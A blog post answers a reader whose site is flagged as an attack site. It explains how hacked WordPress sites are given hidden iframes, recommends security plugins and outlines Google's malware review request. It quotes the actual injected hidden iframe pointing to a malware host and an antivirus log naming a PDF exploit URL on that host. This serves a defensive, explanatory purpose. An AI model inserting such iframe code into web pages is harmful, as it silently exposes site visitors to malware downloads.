I run a website on seo and recently its acting weird with the following messages in google search results and when i access it. When i do a site:mywebsite.com search in google, i get a message below the search result stating that ‘This site may harm your computer.’ which is making me lose visitors, apart from which iam not able to access my website. What may be the problem, because when i try to visit my website i get a message stating that – ‘Reported Attack Site!’ and it says that my website is trying to install programs which can steal private information or damage the visitors computers but i run a genuine information website and have no downloads nor any illegal material. What may be the solution for this problem and is my website hacked? – Question by a Reader through Phone
First of all you need to understand that these are some badware warning against malicious software which is given by Google through stopbadware.org which warns all the google searchers against visiting websites which can be harmful to them. You need to detect malware and also visit the google safe browsing section which lists all the information about different websites and if they were listed as suspicious in the last 90days.
Sometimes because of some wrong permissions on your website scripts like wordpress or when you have easy passwords for your FTP accounts, your websites can be compromised after which these hackers would add some malicious links within your content or in the footer section using direct links with visibility=0 or else using iFrames. You need to continuously make sure that your websites content is secure and you have no links placed by the hackers anywhere on your ftp.
Read this wordpress security guide which can give you some important points you need to make note of while running a blog and also here are some plugins which you need to run on your wordpress blog to make sure you can regularly scan for the content of your blog and all he plugin files and theme files.
My Experience :
Recently after making a quick check on my blog, i found that there were some iframe codes added to my blogs homepage which i could not detect but a friend anurag messaged me about the same. The website was not accessible to him because his Antivirus Software ‘nod32′ could detect and disallowed him to access the website with a virus message. His antivirus software even removed the virus from his PC which got downloaded, and then he recieved the following message :
HTTP filter file http://brugeni.net/p1d2f3.php?id=2038730&vis=1 PDF/Exploit.Pidief.OJS.Gen trojan connection terminated – quarantined Anurag\Ozakx Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
When i visited the footer.php & index.php file of my wordpress installation i found the following iframe added to the files at the end which is the reason the homepage was continiously loading like a loop and was also breaking the theme files, though as a normal user anyone cannot find out this malicious code in the blog, unless the antivirus softwares can find them.
<iframe src=”http://brugeni.net/?click=44E729″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
Solution for Removing the iFrames :
There are several wordpress plugins which can help you stay secure by checking all the file permissions, blog content and your ftp files. Here are few recommendations :
- WP Security Scan –
Scans your WordPress installation for security vulnerabilities and suggests corrective actions. You need to install this plugin in your wordpress blog and then activate it, following which you will find a complete new menu called as ‘WP – Security Admin Tools’ where you can find all the System Information & links to scanner where you can find all the current permissions of the files under your root folder and the permissions you need to change for more security.
-WordPress admin protection/security
- Secure WP Plugin
This plugin is very useful because it does a lot of stuff by creating some pages which can be accessed by others and removing info from your website which should not be allowed to be accessed by others.
# removes error-information on login-page
# adds index.html to plugin-directory (virtual)
# removes the wp-version, except in admin-area
# removes Really Simple Discovery
# removes Windows Live Writer
# remove core update information for non-admins
# remove plugin-update information for non-admins
Steps to Remove the Warning :
Once the warning is shown for your website, expect 0% visitors for your website from Google because the warning message will block the visitors from entering into the site. You need to get this warning removed by Google as soon as possible and for this the very first step would be to remove the malicious links, hackers codes or any other stuff which was the cause of this warning. Once you are sure that you have found the problem and removed those codes you need to proceed to the next step of contacting Google.
Login to your Google Webmaster tools account which is also useful for regaining google rankings. You need to make sure you have added your website in the Webmaster Tools by confirming that you are owner by adding the ‘Meta’ code or uploading a file which it offers you. Once this is done you need to perform the following 3 steps and wait for Google Webmaster Team to review your website and confirm that your website does not distribute badware or hosts it.
1. On the Webmaster Tools Home page, select the site you want.
2. In the Parts of this site may be distributing malware message, click More details.
3. Click Request a review.
Previously it used to take a lot of time for this procedure but nowadays within 2-3days time frame the websites are reviewed and the warning is removed. Let me know if you have any questions about this problem and if your website is attacked with any of this kind of problems.